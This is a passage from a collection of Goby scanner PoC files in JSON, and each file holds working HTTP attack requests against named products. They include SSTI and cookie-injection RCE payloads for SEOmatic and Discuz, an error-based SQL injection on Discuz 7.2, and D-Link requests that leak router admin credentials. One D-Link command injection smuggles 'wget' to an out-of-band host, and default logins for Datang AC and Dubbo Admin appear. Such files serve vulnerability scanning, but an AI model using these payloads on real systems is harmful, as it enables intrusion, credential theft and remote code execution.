"ResponseTest": { 45 | "type": "group", 46 | "operation": "AND", 47 | "checks": [ 48 | { 49 | "type": "item", 50 | "variable": "$code", 51 | "operation": "==", 52 | "value": "200", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "MetaLinkContainer", 60 | "bz": "" 61 | }, 62 | { 63 | "type": "item", 64 | "variable": "$body", 65 | "operation": "contains", 66 | "value": "canonical", 67 | "bz": "" 68 | }, 69 | { 70 | "type": "item", 71 | "variable": "$body", 72 | "operation": "contains", 73 | "value": "25", 74 | "bz": "" 75 | } 76 | ] 77 | }, 78 | "SetVariable": [ 79 | "output|lastbody|regex|" 80 | ] 81 | } 82 | ], 83 | "ExploitSteps": [ 84 | "AND", 85 | { 86 | "Request": { 87 | "method": "GET", 88 | "uri": "/actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B{{{cmd}}}%7D%7D", 89 | "follow_redirect": false, 90 | "header": null, 91 | "data_type": "text", 92 | "data": "", 93 | "set_variable": [] 94 | }, 95 | "ResponseTest": { 96 | "type": "group", 97 | "operation": "AND", 98 | "checks": [ 99 | { 100 | "type": "item", 101 | "variable": "$code", 102 | "operation": "==", 103 | "value": "200", 104 | "bz": "" 105 | } 106 | ] 107 | }, 108 | "SetVariable": [ 109 | "output|lastbody||" 110 | ] 111 | } 112 | ], 113 | "PostTime": "2021-11-11 20:45:35", 114 | "GobyVersion": "1.8.302" 115 | } -------------------------------------------------------------------------------- /Datang_AC_Default_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Datang AC Default Password", 3 | "Level": "2", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "(app=\"大唐电信AC集中管理平台\" | title=\"大唐电信AC集中管理平台\")", 8 | "Description": "大唐AC集中管理平台默认密码admin/123456", 9 | "Product": "大唐电信AC集中管理平台", 10 | "Homepage": "http://www.datang.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "POST", 26 | "uri": "/login.cgi", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "window.open('index.htm?_", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$head", 54 | "operation": "contains", 55 | "value": "ac_userid=admin,ac_passwd=", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody|regex|" 62 | ] 63 | } 64 | ], 65 | "ExploitSteps": [ 66 | "AND", 67 | { 68 | "Request": { 69 | "method": "GET", 70 | "uri": "/test.php", 71 | "follow_redirect": true, 72 | "header": null, 73 | "data_type": "text", 74 | "data": "", 75 | "set_variable": [] 76 | }, 77 | "ResponseTest": { 78 | "type": "group", 79 | "operation": "AND", 80 | "checks": [ 81 | { 82 | "type": "item", 83 | "variable": "$code", 84 | "operation": "==", 85 | "value": "200", 86 | "bz": "" 87 | }, 88 | { 89 | "type": "item", 90 | "variable": "$body", 91 | "operation": "contains", 92 | "value": "test", 93 | "bz": "" 94 | } 95 | ] 96 | }, 97 | "SetVariable": [ 98 | "output|lastbody|regex|" 99 | ] 100 | } 101 | ], 102 | "PostTime": "2021-11-12 19:44:34", 103 | "GobyVersion": "1.8.302" 104 | } -------------------------------------------------------------------------------- /DedeCMS_Carbuyaction_FileInclude.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DedeCMS Carbuyaction FileInclude", 3 | "Level": "2", 4 | "Tags": [ 5 | "FileInclude" 6 | ], 7 | "GobyQuery": "app=\"DedeCMS\"", 8 | "Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞", 9 | "Product": "DedeCMS", 10 | "Homepage": "http://www.dedecms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.cnblogs.com/milantgh/p/3615986.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/plus/carbuyaction.php?dopost=return&code=../../", 29 | "follow_redirect": true, 30 | "header": { 31 | "Cookie": "code=alipay" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [ 51 | "output|lastbody|regex|" 52 | ] 53 | }, 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/plus/carbuyaction.php?dopost=return&code=../../", 58 | "follow_redirect": true, 59 | "header": { 60 | "Cookie": "code=cod" 61 | }, 62 | "data_type": "text", 63 | "data": "", 64 | "set_variable": [] 65 | }, 66 | "ResponseTest": { 67 | "type": "group", 68 | "operation": "AND", 69 | "checks": [ 70 | { 71 | "type": "item", 72 | "variable": "$code", 73 | "operation": "==", 74 | "value": "200", 75 | "bz": "" 76 | }, 77 | { 78 | "type": "item", 79 | "variable": "$body", 80 | "operation": "contains", 81 | "value": "Cod::respond()", 82 | "bz": "" 83 | } 84 | ] 85 | }, 86 | "SetVariable": [ 87 | "output|lastbody|regex|" 88 | ] 89 | } 90 | ], 91 | "PostTime": "2021-11-13 14:18:50", 92 | "GobyVersion": "1.8.302" 93 | } -------------------------------------------------------------------------------- /DedeCMS_InfoLeak_CVE_2018_6910.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DedeCMS InfoLeak CVE-2018-6910", 3 | "Level": "1", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "app=\"DedeCMS\"", 8 | "Description": "远程攻击者可通过对include/downmix.inc.php或inc/inc_archives_functions.php文件发送直接请求利用该漏洞获取完整路径。", 9 | "Product": "DedeCMS", 10 | "Homepage": "http://www.dedecms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/include/downmix.inc.php", 27 | "follow_redirect": true, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "Fatal error", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "contains", 55 | "value": "downmix.inc.php", 56 | "bz": "" 57 | }, 58 | { 59 | "type": "item", 60 | "variable": "$body", 61 | "operation": "contains", 62 | "value": "Call to undefined function helper()", 63 | "bz": "" 64 | } 65 | ] 66 | }, 67 | "SetVariable": [ 68 | "output|lastbody||" 69 | ] 70 | } 71 | ], 72 | "PostTime": "2021-11-14 16:43:48", 73 | "GobyVersion": "1.8.302" 74 | } -------------------------------------------------------------------------------- /Discuz_ML_3.x_RCE__CNVD_2019_22239.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz!ML 3.x RCE CNVD-2019-22239", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=discuz | body=\"Powered by Discuz! X3.4\")", 8 | "Description": "2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用。", 9 | "Product": "Discuz!ML", 10 | "Homepage": "http://discuz.ml/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.cnblogs.com/-mo-/p/11180396.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/forum.php", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [ 49 | "cookiepre|lastbody|regex|cookiepre = '([\\w_]+)'" 50 | ] 51 | }, 52 | { 53 | "Request": { 54 | "method": "GET", 55 | "uri": "/forum.php", 56 | "follow_redirect": false, 57 | "header": { 58 | "Cookie": "{{{cookiepre}}}language=sc'.phpinfo().'" 59 | }, 60 | "data_type": "text", 61 | "data": "", 62 | "set_variable": [] 63 | }, 64 | "ResponseTest": { 65 | "type": "group", 66 | "operation": "AND", 67 | "checks": [ 68 | { 69 | "type": "item", 70 | "variable": "$code", 71 | "operation": "==", 72 | "value": "200", 73 | "bz": "" 74 | }, 75 | { 76 | "type": "item", 77 | "variable": "$body", 78 | "operation": "contains", 79 | "value": "PHP Version", 80 | "bz": "" 81 | }, 82 | { 83 | "type": "item", 84 | "variable": "$body", 85 | "operation": "contains", 86 | "value": "System", 87 | "bz": "" 88 | } 89 | ] 90 | }, 91 | "SetVariable": [ 92 | "output|lastbody|regex|" 93 | ] 94 | } 95 | ], 96 | "PostTime": "2021-11-16 17:10:04", 97 | "GobyVersion": "1.8.302" 98 | } -------------------------------------------------------------------------------- /Discuz_RCE_WOOYUN_2010_080723.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz RCE WOOYUN-2010-080723", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。", 9 | "Product": "discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/viewthread.php?tid=10", 29 | "follow_redirect": false, 30 | "header": { 31 | "Cookie": "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=phpinfo();" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "PHP Version", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "System", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody|regex|" 66 | ] 67 | } 68 | ], 69 | "PostTime": "2021-11-17 13:57:54", 70 | "GobyVersion": "1.8.302" 71 | } -------------------------------------------------------------------------------- /Discuz_Wechat_Plugins_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz Wechat Plugins Unauth", 3 | "Level": "2", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "由Discuz论坛官方微信登录插件产生,攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号,通过该漏洞创建的论坛账号具备一般用户的所有权限,可以任意发帖回帖.", 9 | "Product": "discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/plugin.php?id=wechat:wechat&ac=wxregister", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "302", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$head", 49 | "operation": "contains", 50 | "value": "wsq.discuz.com", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$head", 56 | "operation": "contains", 57 | "value": "set-cookie", 58 | "bz": "" 59 | }, 60 | { 61 | "type": "item", 62 | "variable": "$head", 63 | "operation": "contains", 64 | "value": "auth", 65 | "bz": "" 66 | }, 67 | { 68 | "type": "item", 69 | "variable": "$body", 70 | "operation": "contains", 71 | "value": "location", 72 | "bz": "" 73 | } 74 | ] 75 | }, 76 | "SetVariable": [ 77 | "output|lastbody|regex|" 78 | ] 79 | } 80 | ], 81 | "PostTime": "2021-11-17 13:52:51", 82 | "GobyVersion": "1.8.302" 83 | } -------------------------------------------------------------------------------- /Discuz_v72_SQLI.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz v72 SQLI", 3 | "Level": "2", 4 | "Tags": [ 5 | "sqli" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "discuz7.2论坛存在sql注入漏洞", 9 | "Product": "Discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://blog.csdn.net/weixin_40709439/article/details/82780606" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 ", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "81dc9bdb52d04dc20036dbd8313ed055", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "Discuz! info: MySQL Query Error", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-11-16 17:48:16", 68 | "GobyVersion": "1.8.302" 69 | } -------------------------------------------------------------------------------- /Dlink_850L_Info_Leak.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dlink 850L Info Leak", 3 | "Level": "3", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "(app=\"DIR-850L\" | title==\"DIR-850L\")", 8 | "Description": "D-Link 850L 发现可以未授权加载 htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml.php 文件并获得管理员账号密码等敏感信息", 9 | "Product": "DIR-850L", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://xz.aliyun.com/t/2941" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/hedwig.cgi", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "text/xml", 32 | "Cookie": "uid=R8tBjwtFc7" 33 | }, 34 | "data_type": "text", 35 | "data": "../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml", 36 | "set_variable": [] 37 | }, 38 | "ResponseTest": { 39 | "type": "group", 40 | "operation": "AND", 41 | "checks": [ 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "==", 46 | "value": "200", 47 | "bz": "" 48 | }, 49 | { 50 | "type": "item", 51 | "variable": "$body", 52 | "operation": "contains", 53 | "value": "</usrid>", 54 | "bz": "" 55 | }, 56 | { 57 | "type": "item", 58 | "variable": "$body", 59 | "operation": "contains", 60 | "value": "</password>", 61 | "bz": "" 62 | }, 63 | { 64 | "type": "item", 65 | "variable": "$body", 66 | "operation": "contains", 67 | "value": "<result>OK</result>", 68 | "bz": "" 69 | } 70 | ] 71 | }, 72 | "SetVariable": [ 73 | "output|lastbody||" 74 | ] 75 | } 76 | ], 77 | "ExploitSteps": [ 78 | "AND", 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "/test.php", 83 | "follow_redirect": true, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "==", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "test", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "PostTime": "2021-11-24 19:23:42", 115 | "GobyVersion": "1.8.302" 116 | } -------------------------------------------------------------------------------- /Dlink_Info_Leak_CVE_2019_17506.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dlink Info Leak CVE-2019-17506", 3 | "Level": "2", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "app=\"D_Link-Router\"", 8 | "Description": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.", 9 | "Product": "Dlink", 10 | "Homepage": " http://www.dlink.com.cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://xz.aliyun.com/t/6453" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/getcfg.php", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "application/x-www-form-urlencoded" 32 | }, 33 | "data_type": "text", 34 | "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "<name>", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "<password>", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody|regex|" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "POST", 74 | "uri": "/getcfg.php", 75 | "follow_redirect": false, 76 | "header": { 77 | "Content-Type": "application/x-www-form-urlencoded" 78 | }, 79 | "data_type": "text", 80 | "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "200", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody||" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-26 19:19:16", 102 | "GobyVersion": "1.9.310" 103 | } -------------------------------------------------------------------------------- /Dlink_RCE_CVE_2019_16920.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dlink RCE CVE-2019-16920", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"D_Link-Router\" | body=\"DIR-655\" | body=\"DIR-866L\" | body=\"DIR-652\" | body=\"DHP-1565\")", 8 | "Description": "Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.", 9 | "Product": "Dlink", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.anquanke.com/post/id/187923" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/apply_sec.cgi", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "application/x-www-form-urlencoded" 32 | }, 33 | "data_type": "text", 34 | "data": "html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://{{{check}}}", 35 | "set_variable": [ 36 | "check|dnslog|4|15" 37 | ] 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$reserver", 53 | "operation": "contains", 54 | "value": "{{{check}}}", 55 | "bz": "" 56 | } 57 | ] 58 | }, 59 | "SetVariable": [ 60 | "output|lastbody|regex|" 61 | ] 62 | } 63 | ], 64 | "ExploitSteps": [ 65 | "AND", 66 | { 67 | "Request": { 68 | "method": "GET", 69 | "uri": "/test.php", 70 | "follow_redirect": true, 71 | "header": null, 72 | "data_type": "text", 73 | "data": "", 74 | "set_variable": [] 75 | }, 76 | "ResponseTest": { 77 | "type": "group", 78 | "operation": "AND", 79 | "checks": [ 80 | { 81 | "type": "item", 82 | "variable": "$code", 83 | "operation": "==", 84 | "value": "200", 85 | "bz": "" 86 | }, 87 | { 88 | "type": "item", 89 | "variable": "$body", 90 | "operation": "contains", 91 | "value": "test", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody|regex|" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-25 18:14:25", 102 | "GobyVersion": "1.9.310" 103 | } -------------------------------------------------------------------------------- /Docker_Registry_API_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Docker Registry API Unauth", 3 | "Level": "2", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "header=\"registry/2.0\"", 8 | "Description": "Docker Registry API 存在未授权访问漏洞,黑客可通过API下载docker images,导致敏感信息泄露。", 9 | "Product": "Docker Registry", 10 | "Homepage": "https://docs.docker.com/registry/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.freeaihub.com/post/6085.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/v2/", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$head", 49 | "operation": "contains", 50 | "value": "docker-distribution-api-version", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$head", 56 | "operation": "contains", 57 | "value": "registry/2.0", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | }, 66 | { 67 | "Request": { 68 | "method": "GET", 69 | "uri": "/v2/_catalog", 70 | "follow_redirect": true, 71 | "header": null, 72 | "data_type": "text", 73 | "data": "", 74 | "set_variable": [] 75 | }, 76 | "ResponseTest": { 77 | "type": "group", 78 | "operation": "AND", 79 | "checks": [ 80 | { 81 | "type": "item", 82 | "variable": "$code", 83 | "operation": "==", 84 | "value": "200", 85 | "bz": "" 86 | }, 87 | { 88 | "type": "item", 89 | "variable": "$body", 90 | "operation": "contains", 91 | "value": "repositories", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody|regex|" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-27 14:21:33", 102 | "GobyVersion": "1.9.310" 103 | } -------------------------------------------------------------------------------- /Dubbo_Admin_Default_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dubbo Admin Default Password", 3 | "Level": "3", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "app=\"APACHE-dubbo\"", 8 | "Description": "Dubbo Admin管理控制台存在默认口令root/root和guest/guest", 9 | "Product": "dubbo", 10 | "Homepage": "https://dubbo.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/chaitin/xray/blob/master/pocs/dubbo-admin-default-password.yml" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "OR", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/", 29 | "follow_redirect": false, 30 | "header": { 31 | "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q=" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "<title>Dubbo Admin</title>", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "/sysinfo/versions", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody|regex|" 66 | ] 67 | }, 68 | { 69 | "Request": { 70 | "method": "GET", 71 | "uri": "/", 72 | "follow_redirect": false, 73 | "header": { 74 | "Authorization": "Basic cm9vdDpyb290" 75 | }, 76 | "data_type": "text", 77 | "data": "", 78 | "set_variable": [] 79 | }, 80 | "ResponseTest": { 81 | "type": "group", 82 | "operation": "AND", 83 | "checks": [ 84 | { 85 | "type": "item", 86 | "variable": "$code", 87 | "operation": "==", 88 | "value": "200", 89 | "bz": "" 90 | }, 91 | { 92 | "type": "item", 